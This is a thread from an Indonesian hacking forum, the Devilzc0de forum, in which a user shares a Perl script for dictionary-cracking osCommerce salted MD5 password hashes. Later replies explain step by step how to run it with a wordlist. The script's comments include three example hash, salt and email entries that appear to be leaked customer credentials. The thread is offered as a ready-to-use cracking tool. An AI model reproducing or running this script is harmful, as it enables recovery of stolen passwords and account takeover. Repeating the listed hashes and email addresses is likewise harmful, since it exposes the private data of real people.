Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-24-2013, 06:09 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Cracking v
« Previous 1 2 3 4 5 ... 7 Next »

crack password oscommerce

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
crack password oscommerce
12-22-2010, 10:50 PM (This post was last modified: 12-22-2010 10:51 PM by skak_match.)
Post: #1
skak_match Offline
skak match
Posts: 11
Joined: Mar 2010
Reputation: 0
Lightbulb crack password oscommerce
cuma sekedar share dapet dari hasil googling
PHP Code:
#!/usr/bin/perl
#The Donz writes this c0de coz has nothin' to do
#
#Example "oscommerce hash" used by this script.
#  d9c7076ae0c621b70386f3c3c595aaa2:55:gabecke@wcnoc.com
#  69a55a3999216a38b63f297e81a8fd53:fa:cfo@cantrellcenter.com
#  0af57b5bda3afaa5df8eca54bba5fdcb:a7:lmmcguire@hotmail.com
#
#Example how to use.
#  perl this.pl hash.txt /usr/share/dict/words
#

use Digest::MD5 qw(md5_hex);
my (@hashlist,@plaintext);
my ($i,$j);
my $combine;
my @got;

if(!
$ARGV[0])
{
  print 
"usage :\t $0 <oscommerce hash> <wordlist>\n";
  exit;
}

open(LOG, ">>crack.log");
open(HASH,"<$ARGV[0]");
chop(@hashlist=<HASH>);
for(
$i=0;$i<=$#hashlist;$i++){
  
@got=split(/:/,$hashlist[$i]);
  
open(PLAIN,"<$ARGV[1]");
  
chop(@plaintext=<PLAIN>);
  for(
$j=0;$j<=$#plaintext;$j++){
    
$combine = $got[1] . $plaintext[$j];
    if(
md5_hex($combine) eq $got[0])
    {
      print 
"Found " . $got[0].":".$got[1] . " / " . $plaintext[$j] . " / " . $got[2] . "\n";
      print 
LOG "Found " . $got[0].":".$got[1] . " / " . $plaintext[$j] . " / " . $got[2] . "\n";
    } 
  }
  
close(PLAIN);
}

# TODO : add threading to make cracking process faster 

cuma aq gak ngerti cara gunainnya di baris ahhhh
PHP Code:
<wordlist> 

mungkin ada yang tau gunainnya bisa bantu share disini mewek
Visit this user's website Find all posts by this user
Quote this message in a reply
12-23-2010, 09:52 PM
Post: #2
dhiebeand69 Offline
./Devilz 1st Cadet
Posts: 4
Joined: Dec 2010
Reputation: 0
RE: crack password oscommerce
jiah.... gk ngerti juga ane...
xaxaxaxaxa
Visit this user's website Find all posts by this user
Quote this message in a reply
12-23-2010, 10:17 PM (This post was last modified: 12-23-2010 10:19 PM by kosim.tampan.)
Post: #3
kosim.tampan Offline
kosim.tampan
Posts: 240
Joined: Dec 2010
Reputation: 9
RE: crack password oscommerce
lah itu kan ada caranya kakak

#Example "oscommerce hash" used by this script.
# d9c7076ae0c621b70386f3c3c595aaa2:55:gabecke@wcnoc.com
# 69a55a3999216a38b63f297e81a8fd53:fa:cfo@cantrellcenter.com
# 0af57b5bda3afaa5df8eca54bba5fdcb:a7:lmmcguire@hotmail.com
#
#Example how to use.#Example "oscommerce hash" used by this script.
# d9c7076ae0c621b70386f3c3c595aaa2:55:gabecke@wcnoc.com
# 69a55a3999216a38b63f297e81a8fd53:fa:cfo@cantrellcenter.com
# 0af57b5bda3afaa5df8eca54bba5fdcb:a7:lmmcguire@hotmail.com
#
#Example how to use.
# perl this.pl hash.txt /usr/share/dict/words
#
# perl this.pl hash.txt /usr/share/dict/words
#

nah kalo script tadi kakak save jadi file cracker.pl
trus kakak punya file wordlist (kumpulan kata) namanya english.txt, disave di /home/kosim/english.txt
nah trus hash2 yang ada 3 biji diatas disave dengan nama file hash.txt
maka untuk nge-cracknya

# perl cracker.pl hash.txt /home/kosim/english.txt

seemoga membantu

wordlist bisa didownload disini,,
http://www.openwall.com/wordlists/
Visit this user's website Find all posts by this user
Quote this message in a reply
07-16-2012, 09:12 PM
Post: #4
ubuntux Offline
./Admiral of Devilzc0der
Posts: 1,623
Joined: Dec 2011
Reputation: 75
RE: crack password oscommerce
usage-nya kayak gini om:
root:~# perl hashnyataruhdisini password.txt
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Mikrotik 5.22 Crack Full L.6 Jehuda 23 414 05-15-2013 12:08 AM
Last Post: s4ngkur14ng
Brick [CRACK] SMADAV KEYGEN 9.3.1 k4mpr3t 13 177 05-14-2013 01:33 PM
Last Post: bytewalker
Tongue Wordpress Password Cracker brianfahmi 16 245 05-13-2013 11:58 PM
Last Post: H_Avenzoar
Bug [Ask] Crack Basic4android androigi 3 128 05-07-2013 02:39 PM
Last Post: kid_1412
  [Solved] Bobol password excel? h3kt0rd3v 3 99 05-05-2013 08:29 PM
Last Post: Super Moderator
Exclamation Rikues crack hashmu disini nubiebangetZ 47 1,256 04-23-2013 03:08 PM
Last Post: uzumady
  [help me] decrypt password cruzzer 3 152 04-21-2013 11:31 AM
Last Post: Wiro sableng
  Cara Crack pass akun facebook f3bri4nt HNc 114 8,472 03-21-2013 10:58 AM
Last Post: abakura
  [Tutor] Password Dictionary Creator (perl) Coziboy 9 231 03-18-2013 06:52 AM
Last Post: 1stswtjr
  Kumpulan Cara Cracking Password - John The Ripper Revres Tanur 25 2,000 02-17-2013 07:24 AM
Last Post: ichr0m3-Tux

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-24-2013, 06:09 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE